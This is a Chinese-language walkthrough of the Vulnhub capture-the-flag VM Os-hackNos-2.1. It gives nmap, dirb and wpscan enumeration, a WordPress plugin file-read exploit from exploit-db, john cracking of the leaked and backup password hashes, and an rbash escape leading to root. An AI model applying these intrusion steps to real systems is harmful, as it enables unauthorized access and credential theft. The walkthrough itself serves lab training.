Vulnhub靶机介绍:
vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。
拿到shell 获取最终的flag,只有拿到root权限才可以发现最终的flag。
Vulnhub靶机下载:
官网地址:https://download.vulnhub.com/hacknos/Os-hackNos-2.1.ova
Vulnhub靶机安装:
0.靶机配置
将下载下来的靶机文件Os-hackNos-2.1.ova导入到vm中
导入后,因为无法获取ip地址,故需要进行设置配置
需要在启动界面点击shift进入如下界面按下e
向下翻动,将ro改为rw single init=/bin/bash
然后按下 ctrl+x进入shell
使用ip a查看网卡名
使用 :q退出后
使用vim /etc/netplan/50-cloud-init.yaml进行编辑,此处将错误的网卡改为ens33
1.信息收集
1.1主机发现
在kali里使用netdiscover
发现主机
攻击机机:kali IP :192.168.245.129 靶机IP :192.168.245.132
1.2查看端口
nmap -sV -p- 192.168.245.132
可以发现开启了22端口和80端口
先访问一下80端口:http://192.168.245.132:80 熟悉以下界面
1.3目录扫描
dirb http://192.168.245.132
访问:http://192.168.245.132/tsweb/
使用WpScan
扫描一下后台 发现了一个插件 searchsploit
搜索我们本地漏洞库看看有没有漏洞
- -e是表示开启枚举模式,
- p是代表枚举所有的插件(plugins)
wpscan --url http://192.168.245.132/tsweb -e p
2.漏洞利用
2.1从kali上搜索本地是否存在gracemedia-media-player插件的poc
searchsploit gracemedia
cat /usr/share/exploitdb/exploits/php/webapps/46537.txt
可以看到有这么一行
flag:$1$flag$vqjCxzjtRc7PofLYS2lWf/:1001:1003::/home/flag:/bin/rbash
2.2接下来我们破解flag的密码
kali执行如下命令:
echo 'flag:$1$flag$vqjCxzjtRc7PofLYS2lWf/' > 1.txt
gunzip /usr/share/wordlists/rockyou.txt.gz
john --wordlist=/usr/share/wordlists/rockyou.txt 1.txt --format=md5crypt
2.3ssh登陆
ssh flag@192.168.245.132
密码:topsecret
cat /etc/passwd | grep bash
发现并没有可以利用的 ,因此需要要换个思路,可能存在什么备份文件之类的 ,passwd文件中有一个叫rohit的用户,发现没有权限。
可以看到我们当前的flag用户是一个rbash权限,比较低,所以执行不了cd命令,我们输入sh重新启动一个标准shell即可
然后输入:
sh
cd /var/backups/passbkp //这里存放着密码备份信息
进入sh 查看备份文件里面的md5-hash 复制出来使用john再次进行爆破
获得密码 !%hack41
sudo su 提权
su rohit
密码:!%hack41
家目录下的txt文件即我们最终获取文件
cd ~
ls
cat root.txt
至此获取到了flag,渗透测试结束。